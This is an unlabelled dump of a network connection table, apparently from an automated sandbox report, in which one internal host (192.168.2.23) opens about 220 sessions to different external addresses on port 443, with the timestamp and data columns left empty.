                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12628192.168.2.2353906158.82.35.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12629192.168.2.235053635.24.111.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12630192.168.2.233852634.84.106.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12631192.168.2.235306279.156.158.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12632192.168.2.233778238.175.117.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12633192.168.2.235251861.189.84.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12634192.168.2.2334732177.203.47.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12635192.168.2.2333454119.175.228.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12636192.168.2.2333596114.155.32.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12637192.168.2.235475877.48.226.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12638192.168.2.2355428149.250.109.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12639192.168.2.2350350153.29.229.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12640192.168.2.2355818159.158.172.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12641192.168.2.234661849.128.22.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12642192.168.2.2337546205.123.140.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12643192.168.2.235678274.247.40.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12644192.168.2.2355874132.199.144.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12645192.168.2.2340574190.230.245.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12646192.168.2.235144453.93.89.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12647192.168.2.2351840142.14.37.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12648192.168.2.2342890125.9.63.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12649192.168.2.2341358116.252.76.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12650192.168.2.2357478170.7.82.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12651192.168.2.2342866146.92.12.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12652192.168.2.234680625.219.214.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12653192.168.2.233329274.19.69.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12654192.168.2.234442462.158.151.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12655192.168.2.2338822143.205.103.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12656192.168.2.236057297.207.210.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12657192.168.2.234231678.150.116.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12658192.168.2.2353548130.190.76.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12659192.168.2.234027058.100.48.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12660192.168.2.2339406194.95.134.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12661192.168.2.235431414.195.209.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12662192.168.2.2341916126.86.219.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12663192.168.2.2336204164.120.177.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12664192.168.2.234312647.240.47.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12665192.168.2.233838049.93.63.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12666192.168.2.2337134186.165.189.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12667192.168.2.234026476.217.40.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12668192.168.2.236053049.138.201.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12669192.168.2.2348796117.65.86.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12670192.168.2.2356542179.3.87.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12671192.168.2.235745823.220.35.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12672192.168.2.2349704143.190.65.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12673192.168.2.2345950112.62.80.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12674192.168.2.2350128192.203.49.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12675192.168.2.234040039.130.170.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12676192.168.2.2333556171.82.147.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12677192.168.2.236092648.92.48.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12678192.168.2.234087299.2.71.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12679192.168.2.2332840171.60.52.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12680192.168.2.2356706146.154.25.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12681192.168.2.233298899.2.157.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12682192.168.2.2359484179.239.168.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12683192.168.2.2343930102.49.35.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12684192.168.2.2356630201.185.55.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12685192.168.2.2333116103.31.209.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12686192.168.2.2350544162.251.20.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12687192.168.2.234427052.145.215.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12688192.168.2.2345854132.51.234.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12689192.168.2.234834664.161.221.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12690192.168.2.2338790148.104.91.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12691192.168.2.2339356147.217.45.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12692192.168.2.235252851.177.105.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12693192.168.2.2343804174.225.87.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12694192.168.2.2356134180.244.143.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12695192.168.2.233606864.107.141.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12696192.168.2.235191299.92.148.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12697192.168.2.234010865.180.135.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12698192.168.2.2348358125.104.205.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12699192.168.2.234241498.13.48.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12700192.168.2.2354702163.228.161.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12701192.168.2.23553701.24.181.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12702192.168.2.234649273.198.114.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12703192.168.2.2346808153.66.5.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12704192.168.2.2337370149.121.184.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12705192.168.2.233579014.7.32.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12706192.168.2.234436459.142.110.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12707192.168.2.234314083.0.112.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12708192.168.2.2342626110.167.106.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12709192.168.2.2345606151.39.136.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12710192.168.2.233637043.96.111.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12711192.168.2.236034652.236.9.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12712192.168.2.235280071.224.157.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12713192.168.2.2360624181.134.148.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12714192.168.2.235430446.179.67.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12715192.168.2.2353700104.89.14.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12716192.168.2.235299032.196.179.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12717192.168.2.23331485.248.29.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12718192.168.2.2352674132.222.223.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12719192.168.2.2346446183.160.184.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12720192.168.2.233708219.123.186.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12721192.168.2.234151851.132.249.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12722192.168.2.2355672177.175.145.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12723192.168.2.2349610116.62.242.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12724192.168.2.235163095.124.217.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12725192.168.2.2337454190.246.191.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12726192.168.2.2345544121.246.115.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12727192.168.2.235145262.188.20.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12728192.168.2.234835676.62.5.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12729192.168.2.234480669.236.108.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12730192.168.2.234171234.20.101.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12731192.168.2.2347050219.82.248.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12732192.168.2.2360260112.102.202.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12733192.168.2.235876466.101.71.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12734192.168.2.234816439.44.179.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12735192.168.2.2346878137.209.213.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12736192.168.2.2338574132.200.187.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12737192.168.2.2336672209.255.203.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12738192.168.2.2351434134.148.193.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12739192.168.2.2340308198.21.202.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12740192.168.2.2345538108.46.40.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12741192.168.2.233667459.226.205.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12742192.168.2.2343630177.41.155.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12743192.168.2.2360054205.117.178.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12744192.168.2.2335712212.129.78.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12745192.168.2.2360566112.73.197.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12746192.168.2.2333680119.220.99.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12747192.168.2.2340672216.137.189.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12748192.168.2.2344912219.182.253.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12749192.168.2.235257418.153.182.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12750192.168.2.233716891.241.79.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12751192.168.2.234106096.51.102.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12752192.168.2.235526696.190.196.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12753192.168.2.234124058.188.164.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12754192.168.2.2339094109.146.148.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12755192.168.2.2355558157.167.7.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12756192.168.2.2333932166.34.27.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12757192.168.2.2334130159.223.199.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12758192.168.2.233868063.42.139.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12759192.168.2.2347974169.130.49.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12760192.168.2.2335404176.230.3.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12761192.168.2.234542060.22.175.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12762192.168.2.2356390147.237.159.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12763192.168.2.234398893.46.244.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12764192.168.2.234118039.217.85.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12765192.168.2.233348669.140.145.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12766192.168.2.2341832194.217.121.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12767192.168.2.23609268.160.228.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12768192.168.2.2334004201.14.45.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12769192.168.2.233978099.132.198.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12770192.168.2.2354584201.84.8.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12771192.168.2.235363052.194.121.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12772192.168.2.2344182101.51.81.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12773192.168.2.2360062145.110.34.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12774192.168.2.2335116162.27.201.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12775192.168.2.235165434.192.82.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12776192.168.2.236066065.238.1.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12777192.168.2.2344700201.165.182.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12778192.168.2.234128845.190.217.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12779192.168.2.233508497.162.235.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12780192.168.2.2338272140.139.222.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12781192.168.2.235534049.162.128.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12782192.168.2.2343144106.15.13.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12783192.168.2.2353142179.251.106.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12784192.168.2.2358756156.79.195.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12785192.168.2.235795077.234.243.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12786192.168.2.235772845.234.62.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12787192.168.2.233498066.73.244.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12788192.168.2.2342782166.86.159.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12789192.168.2.235196286.57.213.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12790192.168.2.2339934188.208.112.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12791192.168.2.234844097.78.72.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12792192.168.2.2344354200.107.67.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12793192.168.2.2338640110.33.40.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12794192.168.2.2346692140.17.122.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12795192.168.2.2335122158.71.183.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12796192.168.2.234743637.74.202.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12797192.168.2.234629651.99.22.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12798192.168.2.2351140107.65.216.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12799192.168.2.2359426118.179.64.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12800192.168.2.2354430159.46.249.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12801192.168.2.2337406197.126.171.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12802192.168.2.2345154216.144.37.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12803192.168.2.235404858.27.248.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12804192.168.2.2332982145.148.31.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12805192.168.2.235592494.110.215.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12806192.168.2.2347418151.89.65.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12807192.168.2.2349664132.26.212.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12808192.168.2.2351298170.123.4.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12809192.168.2.2358756110.144.40.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12810192.168.2.235329877.222.140.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12811192.168.2.235924431.25.158.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12812192.168.2.233837851.194.237.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12813192.168.2.235978893.32.150.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12814192.168.2.2351338193.50.73.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12815192.168.2.2338568131.44.14.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12816192.168.2.2337680202.82.48.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12817192.168.2.233963096.187.15.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12818192.168.2.235061264.170.38.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12819192.168.2.2340738144.22.186.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12820192.168.2.2352992144.220.128.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12821192.168.2.2354680200.239.36.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12822192.168.2.233316425.123.107.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12823192.168.2.235697839.89.139.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12824192.168.2.235006434.106.63.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12825192.168.2.234227665.219.38.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12826192.168.2.233371017.181.228.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12827192.168.2.2336578152.50.124.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12828192.168.2.2338032124.227.168.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12829192.168.2.235004619.37.173.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12830192.168.2.2333610223.37.103.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12831192.168.2.2346388124.244.182.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12832192.168.2.2339224141.74.30.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12833192.168.2.2347348171.64.29.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12834192.168.2.2347726147.159.170.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12835192.168.2.2339548201.193.249.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12836192.168.2.234174841.118.104.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12837192.168.2.234020617.133.218.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12838192.168.2.23360049.27.200.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12839192.168.2.2333544139.160.121.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12840192.168.2.2346246222.0.186.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12841192.168.2.234352284.134.111.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12842192.168.2.2352226124.182.62.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12843192.168.2.2337356123.122.228.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12844192.168.2.2337526168.57.58.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12845192.168.2.2353984167.0.121.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12846192.168.2.2356150167.171.220.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12847192.168.2.2352030157.106.128.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12848192.168.2.2344294143.51.171.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12849192.168.2.235343050.207.64.124443
